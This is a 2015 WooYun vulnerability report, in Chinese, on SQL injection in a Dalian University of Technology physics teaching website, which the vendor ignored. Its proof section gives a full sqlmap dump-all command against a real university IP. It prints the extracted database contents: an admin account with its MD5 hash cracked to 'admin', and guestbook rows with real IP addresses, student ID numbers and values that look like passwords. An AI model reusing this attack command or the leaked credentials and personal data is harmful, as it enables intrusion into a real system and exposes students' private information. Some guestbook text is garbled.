当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092479

漏洞标题:大连理工大学 物理教学中心 sql注入漏洞

相关厂商:大连理工大学

漏洞作者: 0x0932

提交时间:2015-01-19 17:28

修复时间:2015-01-24 17:30

公开时间:2015-01-24 17:30

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

大连理工大学 物理教学中心 sql注入漏洞

详细说明:


http://phyedu.dlut.edu.cn/show.php?id=325


web application technology: PHP 4.4.4
back-end DBMS operating system: Linux Debian 4.0 (etch)
back-end DBMS: active fingerprint: MySQL >= 5.0.19 and < 5.0.38
comment injection fingerprint: MySQL 5.0.32
banner parsing fingerprint: MySQL 5.0.32, logging enabled
html error message fingerprint: MySQL
banner: '5.0.32-Debian_7etch12-log'


漏洞证明:

sqlmap -u"http://202.118.65.46/knowledgeshow.php?id=4" -f --banner --dbs --users --tables --columns --dump-all
可以获取数据库,表,字段

database management system users [1]:
[*] 'jpkc6'@'%'
available databases [2]:
[*] information_schema
[*] phy
Database: phy
[7 tables]
+---------------------------------------+
| admin |
| guestbook |
| labnews |
| link |
| mainnews |
| news |
| teacher |
+---------------------------------------+


Database: phy
Table: admin
[1 entry]
+----+------------------------------------------+-------+
| id | pwd | name |
+----+------------------------------------------+-------+
| 1 | 21232f297a57a5a743894a0e4a801fc3 (admin) | admin |
+----+------------------------------------------+-------+
Database: phy
Table: guestbook
[13 entries]
+----+-----------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+
| id | ip | user | content | dateline |
+----+-----------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+
| 2 | 202.118.73.211 | student | dllgdx001 | 2008-03-11 14:37:31 |
| 3 | 202.118.73.211 | student | ��~Z�~Y��~K~R�~U~H��~T�~Z~D��~D�~V~Y�~\��~S��~G~L��~_��~_��~_ | 2008-03-11 14:37:56 |
| 4 | 222.26.175.31 | 200749022 | 881206\r\n | 2009-03-01 15:42:45 |
| 5 | 222.26.201.3 | 200731084 | 1988117 | 2009-03-01 22:24:47 |
| 6 | 58.155.219.59 | 200873531 | 19631011

修复方案:

开发人员应该知道

版权声明:转载请注明来源 0x0932@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-24 17:30

厂商回复:

最新状态:

暂无


漏洞评价:

评论